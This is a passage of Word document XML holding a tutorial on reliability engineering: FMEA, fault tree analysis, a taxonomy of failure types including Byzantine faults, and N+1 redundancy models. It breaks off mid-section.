      <w:r w:rsidRPr="00397DF6">
        <w:t>Before engineering reliability, you must deeply understand </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how systems fail</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Reliability engineering is fundamentally about anticipating, preventing, and recovering from failure modes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AD677" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FMEA (Failure Mode and Effects Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42814C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>FMEA is a systematic technique for identifying every way a system component can fail and analyzing the consequences. For each component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64673A4B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> What are the ways this component can fail? (Database primary crashes, network packet loss, disk fills up, CPU spikes to 100%, certificate expires, third-party API returns 500)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734287C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Effect:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> What happens to the system when this failure occurs? (Writes fail, reads succeed from replica; requests time out; logs stop writing; requests queue and eventually time out; authentication fails for all users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570203B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How bad is the effect? (1-10 scale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354BE07" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Probability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How likely is this failure mode? (1-10 scale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AB768" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detectability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How quickly and reliably is this failure detected? (1-10 scale — low score means easy to detect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672AF8B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPN (Risk Priority Number):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Severity × Probability × Detectability. Higher RPN = higher priority to address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694261F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal discipline of FMEA</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is tracing failure </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>propagation paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a single component failure rarely stops at that component. It propagates through the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C876275" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D8EB42" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Disk fills up on App Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC62B20" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Log writes fail silently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597156E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    → Application loses observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F7B29" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">      → Errors go undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4CA49" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">        → Silent data corruption accumulates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9105B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">          → Users report wrong data weeks later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9459D4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            → Root cause investigation is impossible (logs are gone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3246DD87" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each arrow is a propagation step. FMEA forces you to trace these chains and implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>containment at each step</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (disk space monitoring → alerting → log rotation → separate log disk → prevent silent write failures in application code).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD50C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault Tree Analysis (FTA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B006F69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>FTA works top-down — you start with an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>undesirable top-level event</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (system outage, data loss) and decompose it into the combination of lower-level events that could cause it. Uses boolean logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEBA74" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203CD87" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Top event: Payment Processing Unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0A8A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  OR gate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29821A9B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Payment Service Down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F437848" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │     AND gate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A6967" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │       </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> All Payment Service instances failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A6903" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │       └── Auto-scaling failed to replace them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B74B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38E459" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Database Unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D04B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │     AND gate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C9FCC1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │       </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Primary failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F234A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │       └── All replicas failed (or failover failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDAE1E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21184E34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    └── Payment Gateway API Unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CF616" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">          (external dependency — outside our control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F971A0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR gates</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> mean any one of the inputs causes the output — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>series reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (weakest link). </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AND gates</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> mean all inputs must occur simultaneously — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parallel reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (redundancy). FTA reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88D37B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single points of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (OR gates with single inputs — no redundancy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825CCAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Minimum cut sets</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the smallest combination of component failures that cause the top event. These are your highest priority reliability investments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A157C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common cause failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a single event appearing in multiple branches simultaneously (power failure taking out both primary and replica because they're in the same rack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028733EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical insight from FTA:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> AND gates require </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>correlated failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to cause outage — you need multiple things to fail simultaneously. Reliability engineering is therefore about </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eliminating common causes</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that can simultaneously trigger multiple branches of AND gates. Independent failures are manageable through redundancy. Correlated failures are the true reliability threat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFEAEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byzantine Failure Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04449285" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Not all failures are equal. The reliability engineering response differs fundamentally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5AB91" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crash failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component stops responding completely. Clean, detectable. The component was functioning correctly until it stopped. Health checks detect this in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583BCCF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Omission failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component fails to send/receive some messages. Responds to some requests, not others. Harder to detect — the component appears alive. Manifests as intermittent timeouts, request drops, partial results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EF1097" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timing failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component responds, but outside the expected time window. Either too slow (timeout) or too fast (responding before data is ready — race conditions). A database that takes 30 seconds to respond to a query that should take 10ms is a timing failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C3DF6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component responds with incorrect values. The most dangerous failure mode — the component appears healthy, health checks pass, but it's returning wrong data. A replica serving stale reads, a cache returning corrupted values, a floating point rounding error accumulating over time. Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>semantic validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> of responses, not just presence/absence checking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C1B653" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byzantine failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component behaves arbitrarily — correct sometimes, incorrect other times, in ways that seem random or adversarial. May contradict itself across requests. In distributed systems: a node that claims different values to different peers, causing split decisions. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byzantine Fault Tolerance (BFT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> requires 3f+1 nodes to tolerate f Byzantine failures — expensive in both node count and coordination overhead. Used in blockchain consensus (PBFT, Tendermint), rarely in traditional distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C4B39" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The reliability engineering implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Most systems are designed to tolerate crash failures (easy — detect and failover). Few are designed to tolerate response failures (hard — requires correctness validation). Almost none tolerate Byzantine failures (prohibitively expensive for most use cases). The gap between crash failure tolerance and response failure tolerance is where most real-world reliability incidents occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E7E9B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="68C49D63">
          <v:rect id="_x0000_i2783" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="792BE349" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Redundancy Patterns — The Deep Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB65B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Redundancy is the foundational reliability technique. But redundancy is not simply "run two copies." The engineering depth is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> redundancy is structured, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> failure modes it protects against, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> failure modes it does not protect against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739595E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+1, N+2, 2N Redundancy Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E266715" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+1 redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> N components needed for full capacity, 1 spare. Survives 1 failure. Under failure, the system runs at N/(N+1) of full capacity — no degradation if N+1 was provisioned for normal load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D54BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> 3 database replicas (N=2 for read capacity, +1 spare). One replica fails — 2 remain, capacity maintained. Two replicas fail simultaneously — 1 remains, capacity drops 50%. Third failure — outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8B4C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+2 redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
